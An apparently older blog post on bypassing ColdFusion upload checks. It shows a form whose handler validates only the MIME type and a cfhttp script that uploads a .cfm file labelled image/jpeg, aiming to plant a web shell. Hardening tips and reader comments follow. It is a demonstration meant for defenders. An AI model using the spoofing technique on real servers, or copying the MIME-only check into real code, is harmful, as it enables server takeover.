Spoofing MIME Types with ColdFusion and CFHTTP

Think your file uploads are secure? Think again. Using this very simple technique with ColdFusion installed locally, you can easily spoof the MIME type of any file and get it uploaded to another server, allowing any number of code exploits.
First, we’re going to write a quick file upload script:

<cfform name='upload' action='uploadact.cfm' enctype='multipart/form-data' method='post'>
<cfinput type='file'
name='FileUpload'
required='yes'
message='Select a file to upload.' /><br />
<cfinput
type='submit'
value='Upload File'
name='submit' />
</cfform>

Notice this goes to an action page called uploadact.cfm which only accepts jpegs and gifs, this form actually handles the upload as follows:

<cfif isDefined('fileUpload')>
<cffile
action='upload'
fileField='fileUpload'
destination='C:path to upload'
accept='image/jpeg,image/gif'
nameconflict='makeunique'>
<p>Thankyou, your file has been uploaded.</p>
<p><a href='/'>Return Home</a></p>
</cfif>

Now for the fun part, we’re going to write a page using cfhttp that would run on the attackers server/workstation that allows for files local to them to be uploaded by faking the MIME type with cfhttpparam:

<cfhttp
url='http://example.com/uploadact.cfm'
method='post'>
<cfhttpparam
type='formfield'
value='Upload File'
name='submit'>
<cfhttpparam
type='file'
name='FileUpload'
file='C:PathTo	est.cfm'
mimetype='image/jpeg'>
</cfhttp>

Now with this we could upload an ASP or ColdFusion based web shell that would essentially give us unlimited access to a server.  So follow the following tips:

  1. If you have an Enterprise license, use Sandbox Security.  This will limit each site to its own set of directories and data sources.
  2. Disable cfexecute and cfregistry.  If you can use Sandboxes, do this for each Sandbox, or setup a global Sandbox on your main site’s directory.  Remember with Sandboxes, if you absolutly need cfexecute, remember that you can setup a Sandbox for a single folder with access to it and put processing files in here (say to use FFMPEG for videos conversion).
  3. Disable JSP (Adobe Instructions) if you don’t actually use it.  Since the default for ColdFusion is to run as System on Windows, any JSP file that makes its way to the server will have full access, and JSP’s don’t follow Sandboxes, so even if they are setup they are of no use.
  4. Run ColdFusion as another user (Adobe Instructions).  Obviously, running ColdFusion as a less privileged user will prevent total control of your server should something malicious get uploaded
  5. Always perform multiple checks on your file uploads (Pete Freitag has a good article on this)

3 thoughts on “Spoofing MIME Types with ColdFusion and CFHTTP”

  1. Thanks for posting this!

    I just wanted to give you a heads up, that there’s actually an easier way to do this.

    If you start up a firefox addon called tamper data, it will allow you to intercept http requests before they get sent to the server. If you go to an upload form of any kind, upload a doc with the wrong mime type, then edit the mime type to an excepted type using tamperdata before it get’s sent to the server you.

    Enjoy! 🙂

  2. I have tried with your code to upload a cfm file using cfhttp. But it is throwing error as I have added accept=”image/jpeg” to cffile.
    I am using Coldfusion 10 and I have directly used your code still its not working.
    Can you please recheck.

    1. This code was written a few years ago, I believe on at last Coldfusion 8 and I’m not surprised this doesn’t work anymore on Coldfusion 10.

Leave a Reply

Your email address will not be published. Required fields are marked *